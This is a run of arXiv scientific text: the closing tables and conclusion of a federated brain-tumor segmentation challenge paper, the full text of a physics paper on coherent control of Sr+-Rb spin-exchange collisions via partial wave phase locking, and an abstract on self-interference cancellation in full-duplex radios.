0,7975 & 0,8258 \\ \hline 75th quantile & 0,9222 & 0,8909 & 0,942 & 0,9787 & 0,9772 & 0,9785 \\ \hline \end{tabular} \end{table} Table 1: Final performance of FedCostWAvg in the 2021 FETS Challenge, DICE and Sensitivity \begin{table} \begin{tabular}{|l|c|c|c|c|c|c|c|} \hline Label & Spec WT & Spec ET & Spec TC & H95 WT & H95 ET & H95 TC & Comm. Cost \\ \hline Mean & 0,9981 & 0,9994 & 0,9994 & 11,618 & 27,2745 & 28,4825 & 0,723 \\ \hline StdDev & 0,0024 & 0,0011 & 0,0014 & 31,758 & 88,566 & 88,2921 & 0,723 \\ \hline Median & 0,9986 & 0,9996 & 0,9998 & 5 & 2,2361 & 3,0811 & 0,723 \\ \hline 25th quantile & 0,9977 & 0,9993 & 0,9995 & 2,8284 & 1,4142 & 1,7856 & 0,723 \\ \hline 75th quantile & 0,9994 & 0,9999 & 0,9999 & 8,6023 & 3,5628 & 7,0533 & 0,723 \\ \hline \end{tabular} \end{table} Table 2: Final performance of FedCostWAvg in the 2021 FETS Challenge, Specificity, Hausdorff95 Distance and Communication Cost \begin{table} \begin{tabular}{|l|c|c|c|c|c|c|} \hline Label & Dice WT & Dice ET & Dice TC & Sens. WT & Sens. ET & Sens. TC \\ \hline Mean & 0,76773526 & 0,741627265 & 0,769244434 & 0,749757737 & 0,770377324 & 0,765940502 \\ \hline StdDev & 0,183035406 & 0,266310234 & 0,284212379 & 0,208271565 & 0,280923214 & 0,297081407 \\ \hline Median & 0,826114563 & 0,848784494 & 0,896213442 & 0,819457864 & 0,886857246 & 0,893165349 \\ \hline 25th quantile & 0,700757354 & 0,700955694 & 0,739356651 & 0,637996476 & 0,728202272 & 0,73357786 \\ \hline 75th quantile & 0,897816734 & 0,910451814 & 0,943718628 & 0,905620122 & 0,956570051 & 0,964129538 \\ \hline \end{tabular} \end{table} Table 3: Final performance of FedPIDAvg in the 2022 FETS Challenge, DICE and Sensitivity \begin{table} \begin{tabular}{|l|c|c|c|c|c|c|c|} \hline Label & Spec WT & Spec ET & Spec TC & H95 WT & H95 ET & H95 TC & Comm. Cost \\ \hline Mean & 0,9989230 & 0,9995742 & 0,999692 & 24,367549 & 32,796706 & 32,466108 & 0,300 \\ \hline StdDev & 0,0016332 & 0,0007856 & 0,0006998 & 32,007897 & 89,31835 & 85,440174 & 0,300 \\ \hline Median & 0,9994479 & 0,9997990 & 0,999868 & 11,57583 & 2,4494897 & 4,5825756 & 0,300 \\ \hline 25th quantile & 0,998690 & 0,9995254 & 0,999695 & 5,4081799 & 1,4142135 & 2,2360679 & 0,300 \\ \hline 75th quantile & 0,9998540 & 0,9999292 & 0,9999584 & 36,454261 & 10,805072 & 12,359194 & 0,300 \\ \hline \end{tabular} \end{table} Table 4: Final performance of FedPIDAvg in the 2022 FETS Challenge, Specificity, Hausdorff95 Distance and Communication Cost ## 5 Conclusion This paper summarizes our winning contribution to the Federated Tumor Segmentation Challenge 2022. We submitted a PID-inspired aggregation strategy combined with a statistically inspired client selection. The aggregation function considers the number of training samples, the cost function decrease in the previous step as well as an integral term over the individual client's losses in the last rounds. The client selection models data center sizes as following a Poisson distribution and drops the outliers. Our method outperformed all other submissions. ## Acknowledgements We appreciate the valuable input from our supervisors, David Naccache, Adrian Dalca, and Bjoern Menze. Moreover, we want to express our appreciation to the organizers of the Federated Tumor Segmentation Challenge 2022. Leon Mächler is supported by the Ecole normale superieure in Paris. Johannes C. Paetzold is supported by the DCoMEX project, financed by the Federal Ministry of Education and Research of Germany. Suprosanna Shit and Ivan Ezhov are supported by the Translational Brain Imaging Training Network (TRABIT) under the European Union's 'Horizon 2020' research & innovation program (Grant agreement ID: 765148). With the support of the Technical University of Munich - Institute for Advanced Study, funded by the German Excellence Initiative. Ivan Ezhov is also supported by the International Graduate School of Science and Engineering (IGSSE). Johannes C. Paetzold and Suprosanna Shit are supported by the Graduate School of Bioengineering, Technical University of Munich.
2306.13470
Robust Coherent Control of Bimolecular Collisions beyond the Ultracold Regime
Quantum coherent control of bimolecular collisions beyond the ultracold regime can face a major challenge due to the incoherent addition of different partial wave contributions to the total scattering cross section. These contributions become increasingly numerous as the collision energy increases, leading to a loss of overall control. Here, we overcome this limitation by leveraging the recently discovered Partial Wave Phase Locking (PWPL) effect, which synchronizes the oscillations of all partial wave contributions. By using rigorous quantum scattering calculations, we demonstrate that PWPL enables coherent control of spin exchange in ion-atom collisions, far outside the ultracold regime, even with as many as 5000 partial wave contributions. The predicted extent of control is sufficient to be measurable in cold atom-ion hybrid experiments.
Adrien Devolder, Paul Brumer, Timur Tscherbul
2023-06-23T12:17:59Z
http://arxiv.org/abs/2306.13470v1
# Robust Coherent Control of Bimolecular Collisions beyond the Ultracold Regime ###### Abstract Quantum coherent control of bimolecular collisions beyond the ultracold regime can face a major challenge due to the incoherent addition of different partial wave contributions to the total scattering cross section. These contributions become increasingly numerous as the collision energy increases, leading to a loss of overall control. Here, we overcome this limitation by leveraging the recently discovered Partial Wave Phase Locking (PWPL) effect, which synchronizes the oscillations of all partial wave contributions. By using rigorous quantum scattering calculations, we demonstrate that PWPL enables coherent control of spin exchange in ion-atom collisions, far outside the ultracold regime, even with as many as 5000 partial wave contributions. The predicted extent of control is sufficient to be measurable in cold atom-ion hybrid experiments. _Introduction-_ Two-body collisions and chemical reactions of atoms and molecules are responsible for a wide range of phenomena in physics and chemistry[1; 2; 3], such as energy transfer, thermalization, relaxation, decoherence, and spectral line broadening to name a few. As these phenomena determine the properties of dilute gases, they play a central role in atomic and molecular spectroscopy [4], atmospheric science [5], astrochemistry [6], and ultracold chemistry [7; 8]. For this reason, controlling the quantum dynamics of two-body collisions has long been a major thrust of physics and chemistry, and led to the development of several vast fields of research, including coherent control [9], laser control of chemical reactions [10], mode-selective chemistry [1] and stereochemistry [11; 12]. A key challenge in controlling binary collisions and chemical reactions lies in the random nature of scattering events. Specifically, under ambient conditions, the integral collision cross section (or reaction rate) is determined by many partial wave contributions, which are essentially random functions of \(\ell\), the orbital angular momentum for the collision [13; 1]. Quantum control protocols target a given partial wave contribution and rely in the phase of the underlying scattering amplitude (or S-matrix). Thus, the optimal values of the control parameter (be it the value of an external field in field-based control schemes, laser pulse parameters in optimal control, or superposition parameters in coherent control) are necessarily \(\ell\)-dependent, and thus cannot be optimized for all values of \(\ell\) contributing to the integral scattering cross section. This fundamental issue, which we will refer to as "partial wave scrambling" has generally prevented the application of quantum control techniques to collisions [14] and the observation of scattering resonances [15] in the multiple partial wave regime. A common way to combat partial wave scrambling is to cool the colliding species down to the ultracold regime, where collisions are dominated by a single initial partial wave. This eliminates the scrambling in the incident collision channel and reduces its severity in the outgoing channels, allowing for a high degree of control. The current state-of-art control techniques rely on cold molecules/atoms prepared in a well-defined internal state interacting with electric [16; 17; 18], microwave [19; 20; 21; 22; 23], optical [24], or magnetic fields [25; 26]. 
However, the use of external fields may not be suitable for some applications, especially when the collision partners lack electric and/or magnetic dipole moments [27]. Coherent control is an attractive method that does not rely on external fields. This technique involves preparing superpositions of the internal states of colliding particles to create interference effects that can be manipulated by changing the relative phase between the states [28; 29; 9]. Complete coherent control is possible over ultracold resonant exchange processes, such as spin, charge, or excitation exchange, where only a single partial wave is involved in both the incident and final collision channels [27]. These processes can be completely suppressed (or activated), via destructive (constructive) interference. By contrast, coherent control in the multiple partial wave regime can face a major challenge due to the partial wave scrambling. Here, we show that efficient coherent control in the multiple partial wave regime can be achieved using the partial wave phase locking (PWPL) effect [30; 31; 32; 33], which manifests in a coherent addition of different partial wave contribution. The physical origin of the PWPL effect can be attributed to the short-range nature of the spin-exchange interaction and the small magnitude of the centrifugal kinetic energy compared to the well depth of the interaction potential [34], enhancing quantum interference in the multiple partial wave regime. Here, we show this robust PWPL-assisted coherent control of spin exchange in ion-atom collisions (Sr\({}^{+}\)-Rb). Cold atom-ion hybrid systems have been realized experimentally as a promising platform for quantum science [32]. Hence our results can be readily verified in the laboratory. To our knowledge, this is the first approach to control collisions beyond the ultracold regime and can be applied to a wide range of quasiresonant process [33]. _Initial superposition and coherent control of cross section-_ Consider a binary collision \(A+B\), where \(A\) and \(B\) denote atoms or molecules initially prepared in a coherent superposition of internal angular momentum states : \[\ket{\psi_{A}}=N\left(\sqrt{\cos\eta}\ket{j_{A},m_{1A}}+\sqrt{\sin\eta}e^{i \frac{\beta}{2}}\ket{j_{A},m_{2A}}\right), \tag{1}\] \[\ket{\psi_{B}}=N\left(\sqrt{\sin\eta}e^{i\frac{\beta}{2}}\ket{j_{B},m_{1B}}+ \sqrt{\cos\eta}\ket{j_{B},m_{2B}}\right), \tag{2}\] where \(N=\frac{1}{\sqrt{\sin\eta+\cos\eta}}\) is a normalization factor, \(\eta\in[0,\pi/2]\) and \(\beta\in[0,2\pi]\) are the parameters that determine the relative population and phase of the superposition, \(j_{A}\) and \(j_{B}\) are the internal angular momenta of the colliding partners \(A\) and \(B\), and \(m_{1A}\), \(m_{2A}\), \(m_{1B}\), and \(m_{2B}\) are the corresponding projections on the space-fixed quantization axis \(Z\), subject to the constraint \(m_{1A}+m_{2B}=m_{1B}+m_{2A}\) imposed by rotational symmetry, which is required to obtain interference [35]. The initial state for the collision is given by the product \(\ket{\psi_{A}}\ket{\psi_{B}}\): \[\ket{\Psi_{sup}}=N^{2}\Bigg{(}\cos\eta\ket{m_{1A};m_{2B}}+\sin \eta e^{i\beta}\ket{m_{2A};m_{1B}}\] \[+\sqrt{\cos\eta\sin\eta}e^{i\frac{\beta}{2}}(\ket{m_{1A};m_{1B}}+ \ket{m_{2A};m_{2B}})\Bigg{)}, \tag{3}\] where we have defined \(\ket{m_{1A};m_{2B}}\equiv\ket{j_{A},m_{1A}}\ket{j_{B},m_{2A}}\) etc, for brevity. 
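As a quick numerical check of Eq. (3), one can expand Eqs. (1)-(2) directly. The snippet below is a sketch of ours, not code from the paper; the two-level ordering of each collider's internal basis is an illustrative assumption:

```python
import numpy as np

def superposition_state(eta, beta):
    """Build |psi_A>, |psi_B> of Eqs. (1)-(2) in the two-state bases
    {|m_1A>, |m_2A>} and {|m_1B>, |m_2B>}, and return their product state."""
    N = 1.0 / np.sqrt(np.sin(eta) + np.cos(eta))
    psi_A = N * np.array([np.sqrt(np.cos(eta)),
                          np.sqrt(np.sin(eta)) * np.exp(1j * beta / 2)])
    psi_B = N * np.array([np.sqrt(np.sin(eta)) * np.exp(1j * beta / 2),
                          np.sqrt(np.cos(eta))])
    # Kronecker ordering: |m_1A m_1B>, |m_1A m_2B>, |m_2A m_1B>, |m_2A m_2B>.
    return np.kron(psi_A, psi_B)

eta, beta = 0.7, 1.3
psi = superposition_state(eta, beta)
N2 = 1.0 / (np.sin(eta) + np.cos(eta))
# Coefficients predicted by Eq. (3).
expected = N2 * np.array([np.sqrt(np.cos(eta) * np.sin(eta)) * np.exp(1j * beta / 2),
                          np.cos(eta),
                          np.sin(eta) * np.exp(1j * beta),
                          np.sqrt(np.cos(eta) * np.sin(eta)) * np.exp(1j * beta / 2)])
assert np.allclose(psi, expected)
```

The four resulting amplitudes are exactly the interfering pair and the two satellite terms discussed next.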
Due to rotational symmetry, the states \(\ket{m_{1A};m_{2B}}\) and \(\ket{m_{2A};m_{1B}}\) interfere with each other, while the states \(\ket{m_{1A};m_{1B}}\) and \(\ket{m_{2A};m_{2B}}\) instead give rise to satellite terms[27; 9]. For this reason, the superposition, \[\ket{\Psi_{ent}}=\cos\eta\ket{m_{1A};m_{2B}}+\sin\eta e^{i\beta}\ket{m_{2A};m_ {1B}}, \tag{4}\] provides better control, as previously demonstrated [36]. While this superposition is harder to prepare experimentally than that in eq. (3) because the colliding partners are entangled, it provides a useful reference point for comparing different control schemes, as shown below. The cross section from the non-entangled superposition (3) to a final state \(\ket{f}\) can be split into two parts: one related to the cross section from the entangled superposition (4), and one from the satellite terms: \[\sigma_{sup\to f}(\eta,\beta)=N^{4}\left(\sigma_{ent\to f}+\sigma_{sat \to f}\right), \tag{5}\] where \[\sigma_{ent\to f}(\eta,\beta)=\frac{\pi}{k^{2}}\sum_{\ell,m_{ \ell}}\sum_{\ell^{\prime},m^{\prime}_{\ell}}\bigg{|}\cos\eta\ T_{m_{1A}m_{2B} \ell m_{\ell}\to f\ell^{\prime}m^{\prime}_{\ell}}\\ +\sin\eta\ T_{m_{2A}m_{1B}\ell m_{\ell}\to f\ell^{\prime}m^{ \prime}_{\ell}}\bigg{|}^{2}, \tag{6}\] and \[\sigma_{sat\to f}(\eta)=\cos\eta\sin\eta\left(\sigma_{m_{1A};m_{1B}\to f}+ \sigma_{m_{2A};m_{2B}\to f}\right). \tag{7}\] Here, \(\ell\) and \(\ell^{\prime}\) are the initial and final orbital angular momenta for the collision, while \(m_{\ell}\) and \(m^{\prime}_{\ell}\) are the projections of \(\ell\) and \(\ell^{\prime}\) on a space-fixed quantization axis \(Z\), \(T_{m_{1A}m_{2B}\ell m_{\ell}\to f\ell^{\prime}m^{\prime}_{\ell}}\) and \(T_{m_{2A}m_{1B}\ell m_{\ell}\to f\ell^{\prime}m^{\prime}_{\ell}}\) are the \(T\)-matrix elements associated with the initial states \(\ket{m_{1A};m_{2B}}\) and \(\ket{m_{2A};m_{1B}}\), and \(k\) is the relative wavevector. To achieve good control of \(\sigma_{sup\to f}\), it is necessary to exert efficient control over \(\sigma_{ent\to f}\). However, even with good control over the latter, the inclusion of large satellite terms can significantly reduce overall control. This illustrates two important requirements for the efficient coherent control of \(\sigma_{sup\to f}\): (i) achieving the best possible control over \(\sigma_{ent\to f}\) and (ii) minimizing the value of \(\sigma_{sat\to f}\). To quantify these requirements, we define two control indices. First, the extent of control over the cross section from the entangled initial superposition \(\sigma_{ent\to f}\) can be defined as: \[R_{c,ent}=\frac{\left|\sigma_{int}\right|}{\sqrt{\sigma_{m_{1A};m_{2B}\to f} \sigma_{m_{2A};m_{1B}\to f}}}, \tag{8}\] where \[\sigma_{int}=\frac{\pi}{k^{2}}\sum_{\ell,m_{\ell}}\sum_{\ell^{\prime},m^{ \prime}_{\ell}}T_{m_{1A}m_{2B}\ell m_{\ell}\to f\ell^{\prime}m^{\prime}_{\ell }}T^{*}_{m_{2A}m_{1B}\ell m_{\ell}\to f\ell^{\prime}m^{\prime}_{\ell}}, \tag{9}\] is the interference contribution to the integral cross section, and \(\sigma_{m_{1A};m_{1B}\to f}\) and \(\sigma_{m_{2A};m_{2B}\to f}\) are the cross sections from the states \(\ket{m_{1A};m_{1B}}\) and \(\ket{m_{2A};m_{2B}}\) respectively, to the final state \(\ket{f}\). The definition relies on the Schwartz inequality, so that \(R_{c,ent}\) lies between zero and one. 
Second, the effect of the satellite terms is quantified by: \[R_{sat}=\frac{min\left(\sigma_{m_{1A};m_{2B}\to f},\sigma_{m_{2A};m_{1B}\to f} \right)}{max\left(\sigma_{m_{1A};m_{1B}\to f},\sigma_{m_{2A};m_{2B}\to f} \right)}. \tag{10}\] Here, \(min\left(\sigma_{m_{1A};m_{2B}\to f},\sigma_{m_{2A};m_{1B}\to f}\right)\) and \((max\left(\sigma_{m_{1A};m_{1B}\to f},\sigma_{m_{2A};m_{2B}\to f}\right))\) is the smallest (largest) of the two values. Small satellite terms correspond to \(R_{sat}>>1\), a favorable condition for coherent control. Finally, we define a global control index as \(R_{c,sup}=max_{\eta}(V)\), where \(V\) represents the visibility that measures the oscillation of \(\sigma_{sup\to f}(\eta,\beta)\) when only the relative phase \(\beta\) is varied: \[V(\tilde{\eta})=\frac{\sigma_{sup\to f}(\tilde{\eta},\beta^{\tilde{\eta}}_{max})- \sigma_{sup\to f}(\tilde{\eta},\beta^{\tilde{\eta}}_{min})}{\sigma_{sup\to f}( \tilde{\eta},\beta^{\tilde{\eta}}_{max})+\sigma_{sup\to f}(\tilde{\eta},\beta^{ \tilde{\eta}}_{min})}, \tag{11}\] where \(\beta_{min}^{\tilde{\eta}}\) (\(\beta_{max}^{\tilde{\eta}}\)) is the value of \(\beta\) for which the cross-section is minimal (maximal) when \(\eta=\tilde{\eta}\). Like \(R_{c,ent}\), the values of \(R_{c,sup}\) are bound between 0 and 1. _Partial wave scrambling in coherent control-_ The control of the entangled cross section \(\sigma_{ent\to f}\) is limited by incoherent addition of the initial and final partial waves (\(\ell m_{\ell},\ell^{\prime}m_{\ell}^{\prime}\)) in Eq. (6). For a given superposition determined by the parameters (\(\eta\) and \(\beta\)), some partial wave contributions (\(\ell m_{\ell},\ell^{\prime}m_{\ell}^{\prime}\)) may experience constructive interference while others may exhibit destructive interference, suppressing the interference term in Eq. (9) [37]. This partial wave scrambling issue becomes more significant as the collision energy increases, along with the number of (\(\ell m_{\ell},\ell^{\prime}m_{\ell}^{\prime}\)) contributions, and can result in complete loss of control. To quantify partial wave scrambling, we examine the distribution of the superposition parameters (\(\eta,\beta\)) for which each partial wave contribution reaches a minimum value, \(\eta_{min}^{\ell m_{\ell},\ell^{\prime}m_{\ell}^{\prime}}=\arctan\left(\left| \frac{T_{m_{1A}=2B\ell m_{\ell}\to f\ell^{\prime}m_{\ell}^{\prime}}}{\left|T _{m_{2A}=1B\ell m_{\ell}\to f\ell^{\prime}m_{\ell}^{\prime}}\right|}\right.\right)\) and \(\beta_{min}^{\ell m_{\ell},\ell^{\prime}m_{\ell}^{\prime}}=\)\(arg\left(T_{m_{1A}m_{2B}m_{\ell}\to f\ell^{\prime},m_{\ell}^{\prime}}\right)-arg\left(T_{m_{2A} m_{1B}\ell m_{\ell}\to f\ell^{\prime},m_{\ell}^{\prime}}\right)\) depending on the ratio of the magnitudes, and on the difference of phases (arguments) of the \(T\)-matrix elements, respectively. Note that the maximum parameters are simply obtained from: \(\eta_{min}^{\ell m_{\ell},\ell^{\prime}m_{\ell}^{\prime}}+\eta_{max}^{\ell, \ell m_{\ell},\ell^{\prime}m_{\ell}^{\prime}}=\pi/2\) and \(\beta_{max}^{\ell m_{\ell},\ell^{\prime}m_{\ell}^{\prime}}=\)\(\phi_{min}^{\ell m_{\ell},\ell^{\prime}m_{\ell}^{\prime}}=\)\(\pi\). The distribution of the optimal parameters \(\eta_{min}^{\ell m_{\ell},\ell^{\prime}m_{\ell}^{\prime}}\) and \(\beta_{min}^{\ell m_{\ell},\ell^{\prime}m_{\ell}^{\prime}}\) determines the degree of partial wave scrambling. 
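To make these indices concrete, the following sketch (ours, not the authors' code) evaluates \(R_{c,ent}\), \(R_{sat}\), and a \(\beta\)-oscillation visibility from assumed, randomly drawn \(T\)-matrix elements; for brevity the visibility is computed for the entangled cross section, with the relative phase \(e^{i\beta}\) carried by the second amplitude as in Eq. (4), and the wavevector is set to an arbitrary value:

```python
import numpy as np

rng = np.random.default_rng(0)
n_pw = 50                      # number of (l m_l, l' m'_l) contributions (toy value)
k = 1.0                        # relative wavevector (arbitrary units)
pref = np.pi / k**2

# Assumed T-matrix elements: the two interfering initial states and,
# for the satellite terms, the two non-interfering initial states.
T1 = rng.normal(size=n_pw) + 1j * rng.normal(size=n_pw)      # |m_1A; m_2B> -> f
T2 = rng.normal(size=n_pw) + 1j * rng.normal(size=n_pw)      # |m_2A; m_1B> -> f
T_sat1 = rng.normal(size=n_pw) + 1j * rng.normal(size=n_pw)  # |m_1A; m_1B> -> f
T_sat2 = rng.normal(size=n_pw) + 1j * rng.normal(size=n_pw)  # |m_2A; m_2B> -> f

sig1 = pref * np.sum(np.abs(T1)**2)
sig2 = pref * np.sum(np.abs(T2)**2)
sig_int = pref * np.sum(T1 * np.conj(T2))                    # Eq. (9)
R_c_ent = np.abs(sig_int) / np.sqrt(sig1 * sig2)             # Eq. (8)
R_sat = min(sig1, sig2) / max(pref * np.sum(np.abs(T_sat1)**2),
                              pref * np.sum(np.abs(T_sat2)**2))   # Eq. (10)

def sigma_ent(eta, beta):
    # Entangled-superposition cross section, Eq. (6), with the e^{i beta} phase.
    amp = np.cos(eta) * T1 + np.sin(eta) * np.exp(1j * beta) * T2
    return pref * np.sum(np.abs(amp)**2)

# Visibility of the beta-oscillation at fixed eta, in the spirit of Eq. (11).
eta = np.pi / 4
betas = np.linspace(0.0, 2.0 * np.pi, 361)
s = np.array([sigma_ent(eta, b) for b in betas])
V = (s.max() - s.min()) / (s.max() + s.min())
print(R_c_ent, R_sat, V)
```

With uncorrelated random \(T\)-matrix elements as assumed here, \(R_{c,ent}\) comes out near \(1/\sqrt{N_{\ell}}\), which is precisely the scrambling behaviour discussed next; phase-locked elements would instead push it toward unity.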
A random distribution leads to a rapid decrease in control as the number \(N_{\ell}\) of significant partial wave contributions (\(\ell m_{\ell},\ell^{\prime}m_{\ell}^{\prime}\)) increases, because \(R_{c,ent}\) scales as \(1/\sqrt{N_{\ell m_{\ell},\ell^{\prime}m_{\ell}^{\prime}}}\)[37]. The solution of the partial wave scrambling problem lies in the clustering of the optimal parameters \(\eta_{min}^{\ell m_{\ell},\ell^{\prime}m_{\ell}^{\prime}}\) and \(\beta_{min}^{\ell m_{\ell},\ell^{\prime}m_{\ell}^{\prime}}\). As shown below, the clustering of \(\beta_{min}^{\ell m_{\ell},\ell^{\prime}m_{\ell}^{\prime}}\) is manifest in the PWPL mechanism, which dramatically reduces the partial wave scrambling and thereby paves the way to coherent control in the multiple partial wave regime. _Application: Coherent control of spin relaxation in Sr\({}^{+}\)-Rb collisions-_ The PWPL phenomenon was first predicted to occur in spin relaxation in ion-atom collisions, making hybrid ion-atom systems [32] ideal for investigating PWPL assisted coherent control. Consider a rubidium atom (\({}^{87}\)Rb) prepared in a superposition of hyperfine states \(\left|2,-1\right\rangle_{B}\) and \(\left|2,0\right\rangle_{B}\), colliding with a trapped strontium ion \({}^{88}\)Sr\({}^{+}\) prepared in a superposition of Zeeman states \(\left|1/2,-1/2\right\rangle_{A}\) and \(\left|1/2,1/2\right\rangle_{A}\). We present the results for relaxation to the final states \(\left|1/2,-1/2\right\rangle_{A}\left|1,0\right\rangle_{B}\equiv\left|\downarrow\right\rangle\) and \(\left|1/2,+1/2\right\rangle_{A}\left|1,0\right\rangle_{B}\equiv\left|\uparrow\right\rangle\), as these states have larger cross-sections than the final states \(\left|1/2,\pm 1/2\right\rangle_{A}\left|1,-1\right\rangle_{B}\) and \(\left|1/2,\pm 1/2\right\rangle_{A}\left|1,1\right\rangle_{B}\). To motivate experimental studies we carried out rigorous coupled-channel (CC) calculations of Sr\({}^{+}\)-Rb collisions using state of the art ab-initio interaction potentials and second-order spin-orbit interactions, as described in [30]. To ensure numerical convergence of the results for collision energies ranging from 1 \(\mu\)K to 50 mK, we used extended CC basis sets including up to 80 partial waves. The control indices, \(R_{c,ent}\) and \(R_{c,sup}\), for Sr\({}^{+}\)-Rb calculated from exact CC results, are shown in Fig. 1 (a). The high value of the entangled control index, \(R_{c,ent}\), demonstrates that efficient control is possible in the multiple partial-wave regime. For the final state \(\left|\uparrow\right\rangle\), \(R_{c,ent}\) is close to 1, indicating complete control, whereas for the final state \(\left|\downarrow\right\rangle\), \(R_{c,ent}\) is around 0.5-0.6. Remarkably, the high entangled control index remains mostly independent of collision energy, indicating robust control over a wide energy range. Variation of the control can be caused by the presence of resonances, for example at \(E\)= 100 \(\mu\)K, 400 \(\mu\)K, and 5 mK. As expected, the control index for the non-entangled superposition, \(R_{c,sup}\), is affected by satellite terms, which can be quantified using the parameters \(R_{sat}\) (eq. 10) shown in Fig. 1 (b). For the final state \(\left|\uparrow\right\rangle\), the satellite terms are significant, resulting in a large difference between \(R_{c,ent}\) and \(R_{c,sup}\), with \(R_{c,sup}\) being around 0.2-0.3. 
In contrast, the satellite terms are small for the final state \(\left|\downarrow\right\rangle\), resulting in a small difference between \(R_{c,ent}\) and \(R_{c,sup}\), with \(R_{c,sup}\approx\) 0.4-0.5. The reason for the smaller impact of the satellite terms on the final state \(\left|\downarrow\right\rangle\) is that for this state, the interfering transitions conserve the total internal angular momentum projection, \(m_{A}^{i}+m_{B}^{i}=m_{A}^{f}+m_{B}^{f}\), whereas the transitions in the satellite terms do not. The situation is the opposite for the final state \(\left|\uparrow\right\rangle\). These results highlight a com plex trade-off between the partial wave scrambling and satellite terms. Even though partial wave scrambling is less significant for the final state \(\ket{\uparrow}\), the overall control is better for the final state \(\ket{\downarrow}\) due to the smaller effect of the satellite terms. To illustrate coherent control in the multiple partial wave regime, we consider the experimentally realistic case of Sr\({}^{+}\)-Rb collisions at 50 mK [30]. At this collision energy, approximately 5000 (\(\ell m_{\ell},\ell^{\prime}m_{\ell}^{\prime}\)) partial wave states contribute to the cross sections. Figures 2(a)-(d) illustrate coherent control of the cross section by varying the phase angle \(\beta\) of the initial superposition (4). To obtain the best visibility \(V\), the value of \(\eta\) is fixed at \(\eta=\pi/2\) and \(21\pi/32\) for the final states \(\ket{\downarrow}\) and \(\ket{\uparrow}\), respectively. We observe a remarkable instance of complete control of scattering from the entangled superposition to the final state \(\ket{\uparrow}\), showing near vanishing of the cross section due to destructive interference (see Fig. 2 (c)). The minimum value of the cross-section is 6.2 a.u., which is three orders of magnitude smaller than the maximum value of 2517.3 a.u. This complete control is made possible by the clustering of the optimal control parameters \(\eta_{min}^{\ell,m_{\ell},\ell^{\prime},m^{\prime}\ell}\) and \(\beta_{min}^{\ell,m_{\ell},\ell^{\prime},m^{\prime}\ell}\) [see Fig. 3(c) and (d)], caused by PWPL. Note that if these parameters were randomly distributed, the entangled control index \(R_{c,ent}\) would be equal to \(\sim 1/\sqrt{5000}=0.01\), significantly smaller than the calculated value. When the initial superposition is non-entangled, complete destructive interference is countered by the presence of satellite terms, resulting in a variation from 1926.6 to 3350.2 a.u, which remains significant and certainly large enough to be detected in modern hybrid trapped ion-atom collision experiments [30; 31; 32; 33]. For the final state \(\ket{\downarrow}\), the clustering of \(\beta_{min}^{\ell,m_{\ell},\ell^{\prime},m^{\prime}\ell}\) is less effective than for \(\ket{\uparrow}\), as shown in Fig.3 (a) and 4 (a). More detrimental for the control, the distribution of the other optimal parameter, \(\eta_{min}^{\ell m_{\ell},\ell^{\prime}m_{\ell}^{\prime}}\) [see Fig. 4 (b)] is broad, highlighting the importance of the distribution of \(\eta_{min}^{\ell m_{\ell},\ell^{\prime}m_{\ell}^{\prime}}\). The PWPL effect locks the difference of T-matrix phases but not the ratio of their magnitudes, and thus does not guarantee the clustering of \(\eta_{min}^{\ell m_{\ell},\ell^{\prime}m_{\ell}^{\prime}}\). 
While this limitation can prevent PWPL from completely solving the problem of partial wave scrambling, we observe that despite the relatively broad distribution of ratios, a good degree of control is still achievable in the multiple partial wave regime, with \(\sigma_{sup\to f}(\eta,\beta)\) ranging from 2085.5 to 6131.7 a.u. The inclusion of the satellite terms has a slight impact on the control, resulting in a variation from 1827.7 to 3850.7 a.u. As noted above, the control of the scattering to the final states \(\ket{\downarrow}\) and \(\ket{\uparrow}\) is optimized in different regions of parameter space allowing for efficient control of the corresponding branching ratio \(\sigma_{\downarrow}/\sigma_{\uparrow}\), as shown in Fig. 2(e)-(f) at \(\eta=21\pi/32\). With the entangled superposition Eq. (4), extremely robust control is achieved, with \(\sigma_{\downarrow}/\sigma_{\uparrow}\) varying by three orders of magnitude (from 0.94941 to 960.66), thanks to the complete control of \(\sigma_{\uparrow}\). When using the non-entangled superposition (3), the presence of satellite terms limits the extent of control over the branching ratio to 0.66-2.26, which is large enough to be experimentally measurable. _Conclusion-_ In summary, we have shown that partial wave phase-locking enables coherent control in the multiple partial wave regime via a dramatic reduction of partial wave scrambling. The clustering of the optimal superposition parameters \(\beta_{min}^{\ell,m_{\ell},\ell^{\prime},m^{\prime}_{\ell}}\) enabled by PWPL allows for the synchronized control of different partial wave contributions to the total scattering cross section. In cases where the distribution of the optimal control parameters \(\eta_{min}^{\ell,m_{\ell},\ell^{\prime},m^{\prime}_{\ell}}\) is broad, such as for the final state \(\ket{\downarrow}\), partial-wave scrambling is only partially eliminated by PWPL. Even though the satellite terms reduce the control with non-entangled superpositions, our rigorous CC calculations show that coherent control over state-to-state integral cross sections and of the branching ratios is significant and measurable. Therefore, collisions between \({}^{87}\)Rb and \({}^{88}\)Sr\({}^{+}\), observed in a series of recent experiments [30; 31; 32], appear to be ideal for the first experimental observation of coherent control of two-body scattering outside of the ultracold domain. As the PWPL phenomenon was shown to apply to any quasiresonant scattering process [33], a wide range of these processes could soon become amenable to robust coherent control. Furthermore, the extreme sensitivity of coherent control to PWPL effect implies that the study of collisions of atoms and molecules prepared in coherent superposition of internal states provides an ideal approach for investigating the PWPL effect. This work was supported by the U.S. Air Force Office of Scientific Research (AFOSR) under Contract No.FA9550-22-1-0361.
2308.05966
On the Learning of Digital Self-Interference Cancellation in Full-Duplex Radios
Full-duplex communication systems have the potential to achieve significantly higher data rates and lower latency compared to their half-duplex counterparts. This advantage stems from their ability to transmit and receive data simultaneously. However, to enable successful full-duplex operation, the primary challenge lies in accurately eliminating strong self-interference (SI). Overcoming this challenge involves addressing various issues, including the nonlinearity of power amplifiers, the time-varying nature of the SI channel, and the non-stationary transmit data distribution. In this article, we present a review of recent advancements in digital self-interference cancellation (SIC) algorithms. Our focus is on comparing the effectiveness of adaptable model-based SIC methods with their model-free counterparts that leverage data-driven machine learning techniques. Through our comparison study under practical scenarios, we demonstrate that the model-based SIC approach offers a more robust solution to the time-varying SI channel and the non-stationary transmission, achieving optimal SIC performance in terms of the convergence rate while maintaining low computational complexity. To validate our findings, we conduct experiments using a software-defined radio testbed that conforms to the IEEE 802.11a standards. The experimental results demonstrate the robustness of the model-based SIC methods, providing practical evidence of their effectiveness.
Jungyeon Kim, Hyowon Lee, Heedong Do, Jinseok Choi, Jeonghun Park, Wonjae Shin, Yonina C. Eldar, Namyoon Lee
2023-08-11T06:54:28Z
http://arxiv.org/abs/2308.05966v1
